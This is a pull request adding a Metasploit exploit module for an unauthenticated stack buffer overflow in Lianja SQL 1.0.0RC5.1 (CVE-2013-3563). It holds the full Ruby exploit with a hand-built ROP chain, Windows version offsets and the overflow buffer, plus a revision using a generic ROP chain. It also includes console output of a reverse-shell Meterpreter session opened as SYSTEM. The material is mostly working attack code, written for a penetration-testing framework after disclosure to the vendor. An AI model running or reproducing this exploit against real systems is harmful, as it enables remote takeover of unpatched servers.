### PR TITLE
Exploit module for Lianja SQL 1.0.0RC5.1

### DIFF
--- a/modules/exploits/windows/misc/lianja_db_net.rb
+++ b/modules/exploits/windows/misc/lianja_db_net.rb
@@ -10,6 +10,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
 	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::RopDb
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -37,11 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				},
 			'Targets'        =>
 				[
-					[ 'Windows Server 2008 SP1', { 'vp_offset' => 0xffff0488 } ],
-					[ 'Windows 7 SP1', { 'vp_offset' => 0xfffe55f1 } ],
-					[ 'Windows Server 2003 SP1', { 'vp_offset' => 0xffff7483 } ],
-					[ 'Windows XP SP3', { 'vp_offset' => 0xfffed507 } ],
-					[ 'Windows XP SP2', { 'vp_offset' => 0xfffc882d } ],
+					[ 'Windows Server 2003 SP1-SP2', { 'rop_target' => '2003' } ],
+					[ 'Windows XP SP3', { 'rop_target' => 'xp' } ],
 				],
 			'DefaultTarget'  => 0,
 			'Privileged'     => true,
@@ -66,40 +64,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		return Exploit::CheckCode::Safe
 	end
 
-	def rop_chain
-		# all addresses are in zlib1.dll
-		rop_chain = [
-			0x61b8f873,				# POP EBP # RETN
-			0x06b930c6,				# 0x06b930c6-> ebp
-			0x61b86430,				# XCHG EAX,EBP # RETN
-			0x61b88f48,				# MOV ESI,DWORD PTR DS:[EAX+5B000016] # RETN
-			0x61b86858,				# POP ECX # ADC AL,39 # RETN
-			target['vp_offset'],	# something-> ecx (offset of &k32.VirtualProtect - &k32.AddAtomA)
-			0x61b84c8d,				# ADD ESI,ECX # POP EBX # MOV EAX,ESI # POP ESI # RETN
-			0x41414141,				# Filler (compensate)
-			0x61B925e0,				# address of zlib1:.edata
-			0x61b8fcab,				# JMP EAX
-			0x61b8493a,				# RETN (ROP NOP)
-			0x61B925e0,				# address of zlib1:.edata
-			0x00000500,				# dwSize
-			0x00000040,				# NewProtect
-			0x61B925d0,				# lpOldProtect
-			0x61b84939,				# POP EDI # RETN
-			0x00000000,				# 0x00000000-> edi
-			0x61b8f873,				# POP EBP # RETN
-			0x61b93146,				# 0x61b93146-> ebp
-			0x61b86430,				# XCHG EAX,EBP # RETN
-			0x61b8c9fc,				# ADC EDI,DWORD PTR DS:[EAX-2] # MOV EBX,DWORD PTR SS:[ESP+8] # ADD ESP,0C # RETN
-			0x41414141,				# Filler (compensate)
-			0x42424242,				# Filler (compensate)
-			0x00000500,				# size
-			0x61b8f873,				# POP EBP # RETN
-			0x61B925e0,				# address of zlib1:.edata
-			0x61b820fd,				# PUSHAD # RETN
-		].pack("V*")
-		return rop_chain
-	end
-
 	def exploit
 		connect
 		sock.put("db_net")
@@ -109,8 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		evil_data =  '000052E1'
 		evil_data << 'A'
 		evil_data << ('0' * 19991) # this can't be randomized, else a Read Access Violation will occur
-		evil_data << rop_chain
-		evil_data << payload.encoded
+		evil_data << generate_rop_payload('msvcrt', payload.encoded, {'target' => target['rop_target']})
 		sock.put(evil_data)
 		disconnect
 	end

--- a/modules/exploits/windows/misc/lianja_db_net.rb
+++ b/modules/exploits/windows/misc/lianja_db_net.rb
@@ -1,0 +1,117 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a stack buffer overflow in the db_netserver
+				process which is spawned by the Lianja SQL server.  The issue is
+				fixed in Lianja SQL 1.0.0RC5.2.
+			},
+			'Author'         => [ 'Spencer McIntyre' ],
+			'License'        => MSF_LICENSE,
+			'References'     => [
+					[ 'CVE', '2013-3563' ],
+			],
+			'DefaultOptions' =>
+				{
+					'WfsDelay' => 20,
+				},
+			'Platform'       => 'win',
+			'Payload'        =>
+				{
+					'StackAdjustment' => -3500,
+					'Space'           => 500,
+					'BadChars'        => "\x01",
+				},
+			'Targets'        =>
+				[
+					[ 'Windows Server 2008 SP1', { 'vp_offset' => 0xffff0488 } ],
+					[ 'Windows 7 SP1', { 'vp_offset' => 0xfffe55f1 } ],
+					[ 'Windows Server 2003 SP1', { 'vp_offset' => 0xffff7483 } ],
+					[ 'Windows XP SP3', { 'vp_offset' => 0xfffed507 } ],
+					[ 'Windows XP SP2', { 'vp_offset' => 0xfffc882d } ],
+				],
+			'DefaultTarget'  => 0,
+			'Privileged'     => true,
+			'DisclosureDate' => 'May 22 2013'))
+
+		register_options(
+			[
+				Opt::RPORT(8001),
+			], self.class)
+	end
+
+	def check
+		begin
+			connect
+		rescue
+			return Exploit::CheckCode::Safe
+		end
+		sock.put("db_net")
+		if sock.recv(4) =~ /\d{1,5}/
+			return Exploit::CheckCode::Detected
+		end
+		return Exploit::CheckCode::Safe
+	end
+
+	def rop_chain
+		# all addresses are in zlib1.dll
+		rop_chain = [
+			0x61b8f873,				# POP EBP # RETN
+			0x06b930c6,				# 0x06b930c6-> ebp
+			0x61b86430,				# XCHG EAX,EBP # RETN
+			0x61b88f48,				# MOV ESI,DWORD PTR DS:[EAX+5B000016] # RETN
+			0x61b86858,				# POP ECX # ADC AL,39 # RETN
+			target['vp_offset'],	# something-> ecx (offset of &k32.VirtualProtect - &k32.AddAtomA)
+			0x61b84c8d,				# ADD ESI,ECX # POP EBX # MOV EAX,ESI # POP ESI # RETN
+			0x41414141,				# Filler (compensate)
+			0x61B925e0,				# address of zlib1:.edata
+			0x61b8fcab,				# JMP EAX
+			0x61b8493a,				# RETN (ROP NOP)
+			0x61B925e0,				# address of zlib1:.edata
+			0x00000500,				# dwSize
+			0x00000040,				# NewProtect
+			0x61B925d0,				# lpOldProtect
+			0x61b84939,				# POP EDI # RETN
+			0x00000000,				# 0x00000000-> edi
+			0x61b8f873,				# POP EBP # RETN
+			0x61b93146,				# 0x61b93146-> ebp
+			0x61b86430,				# XCHG EAX,EBP # RETN
+			0x61b8c9fc,				# ADC EDI,DWORD PTR DS:[EAX-2] # MOV EBX,DWORD PTR SS:[ESP+8] # ADD ESP,0C # RETN
+			0x41414141,				# Filler (compensate)
+			0x42424242,				# Filler (compensate)
+			0x00000500,				# size
+			0x61b8f873,				# POP EBP # RETN
+			0x61B925e0,				# address of zlib1:.edata
+			0x61b820fd,				# PUSHAD # RETN
+		].pack("V*")
+		return rop_chain
+	end
+
+	def exploit
+		connect
+		sock.put("db_net")
+		sock.recv(4)
+
+		print_status("#{rhost}:#{rport} - Sending Malicious Data")
+		evil_data =  '000052E1'
+		evil_data << 'A'
+		evil_data << ('0' * 19991) # this can't be randomized, else a Read Access Violation will occur
+		evil_data << rop_chain
+		evil_data << payload.encoded
+		sock.put(evil_data)
+		disconnect
+	end
+end


### PR DESCRIPTION
This module exploits an unauthenticated remote stack buffer overflow in Lianja SQL Server 1.0.0RC5.1 for Windows. I have informed the Lianja development team of the vulnerability. The latest stable version of 1.0.0RC5.2, released today, is not vulnerable to this issue.

The module has been tested against the Lianja SQL 1.0.0RC5.1 on Windows 7 SP1, Server 2008 SP1, among others. The target settings are Windows version dependent.

The vulnerability exists in the db_netserver.exe binary which is executed by the parent process, allowing this vulnerability to be exploited more than once.

Lianja homepage: http://www.lianja.com/
Lianja SQL 1.0.0RC5.1 download mirror: http://www.softpedia.com/progDownload/Lianja-SQL-Server-Download-230781.html

```
msf3-git (S:0 J:0)  exploit(lianja_db_net) > show options 

Module options (exploit/windows/misc/lianja_db_net):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.90.147   yes       The target address
   RPORT  8001             yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.90.1     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Server 2008 SP1


msf3-git (S:0 J:0)  exploit(lianja_db_net) > exploit

[*] Started reverse handler on 192.168.90.1:4444 
[*] 192.168.90.147:8001 - Sending Malicious Data
[*] Sending stage (751104 bytes) to 192.168.90.147
[*] Meterpreter session 1 opened (192.168.90.1:4444 -> 192.168.90.147:49158) at 2013-05-29 08:54:13 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```
